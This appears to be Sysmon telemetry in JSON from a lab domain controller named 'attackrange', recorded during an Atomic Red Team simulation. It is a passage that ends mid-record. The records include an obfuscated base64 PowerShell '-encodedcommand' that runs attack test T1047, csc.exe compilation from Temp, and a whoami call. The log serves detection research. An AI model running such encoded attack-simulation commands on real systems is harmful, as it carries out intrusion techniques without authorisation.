{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5172,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5173,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001037360800}\r\nTargetProcessId: 3172\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001037360800}","TargetProcessId":"3172","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5174,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:13.315\r\nProcessGuid: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nProcessId: 2992\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\g41gztmo\\g41gztmo.dll\r\nCreationUtcTime: 2020-08-01 07:59:13.315","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:13.315","ProcessGuid":"{41C8662E-20D0-5F25-0000-0010871B0800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\g41gztmo\\g41gztmo.dll","CreationUtcTime":"2020-08-01 07:59:13.315","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5175,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.315\r\nProcessGuid: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nProcessId: 2992\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\g41gztmo\\g41gztmo.cmdline\r\nCreationUtcTime: 2020-08-01 07:59:13.315","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.315","ProcessGuid":"{41C8662E-20D0-5F25-0000-0010871B0800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\g41gztmo\\g41gztmo.cmdline","CreationUtcTime":"2020-08-01 07:59:13.315","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5176,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.324\r\nProcessGuid: {41C8662E-20D1-5F25-0000-001065390800}\r\nProcessId: 3904\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\g41gztmo\\g41gztmo.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nParentProcessId: 2992\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.324","ProcessGuid":"{41C8662E-20D1-5F25-0000-001065390800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\g41gztmo\\g41gztmo.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{41C8662E-20D0-5F25-0000-0010871B0800}","ParentProcessId":"2992","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5177,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.315\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001065390800}\r\nTargetProcessId: 3904\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663981e3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e250a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.315","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001065390800}","TargetProcessId":"3904","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663981e3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e250a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5178,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.315\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001065390800}\r\nTargetProcessId: 3904\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.315","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001065390800}","TargetProcessId":"3904","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5179,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.d